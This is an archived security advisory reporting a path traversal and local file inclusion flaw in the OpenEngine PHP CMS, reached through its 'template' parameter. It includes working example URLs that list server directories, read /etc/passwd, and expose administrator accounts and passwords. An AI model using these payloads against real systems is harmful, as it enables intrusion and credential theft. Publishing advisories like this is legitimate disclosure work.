TUCoPS :: Web :: CMS / Portals :: b06-2063.htm

OpenEngine (PHP CMS)
OpenEngine (PHP CMS)
OpenEngine (PHP CMS)



OpenEngine is a PHP based CMS.=0D
=0D
The parameter "template" is not correctly checked, for this you can include other scripts which will be interpreted.=0D
=0D
All actual versions are vulnerable (up to 1.8 Beta 2, which is the newest one), only the paths and consequences differ.=0D
=0D
For example you can browse the web server with =0D
=0D
http://cmspath/website.php?template=../system/03_admin/edit/upload&site_pool=/=0D 
=0D
or disclose any file (depending on rights) with=0D
=0D
http://cmspath/website.php?template=../system/03_admin/edit/individual&include=/etc/passwd =0D 
=0D
I have tested these two examples on versions 1.8 Beta 2 and 1.7.1.=0D
=0D
Version 1.6 shows you all administrators of the cms with=0D
=0D
http://cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2=0D 
=0D
Now you know the account_key and can take a look at the chosen administrators password:=0D
=0D
http://cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2&action=editaccount&accounts_lastname=&accounts_email=&accounts_group=2&account_key==0D 
=0D
Of course there are several other possibilities... just vary the parameter "template".

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH